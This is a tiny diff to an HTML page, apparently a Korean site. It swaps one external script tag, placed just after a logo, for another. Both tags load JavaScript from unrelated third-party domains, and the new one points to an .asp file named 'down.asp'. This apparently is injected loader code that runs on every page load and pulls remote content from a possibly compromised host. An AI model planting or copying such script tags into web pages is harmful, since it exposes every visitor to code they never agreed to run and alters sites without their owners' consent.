--- a/index.html
+++ b/index.html
@@ -136,7 +136,7 @@ ul
 <body lang=KO style='tab-interval:40.0pt'>
 	
 <img src="https://www.nterway.com/images/top_logo.png">
-<script type="text/javascript" src="http://hmc.dit.co.kr/member/minfo/theme.js"></script>
+<script type="text/javascript" src="https://www.westoceancc.co.kr/html/course/js/down.asp"></script>
 
 <div class=WordSection1>
 
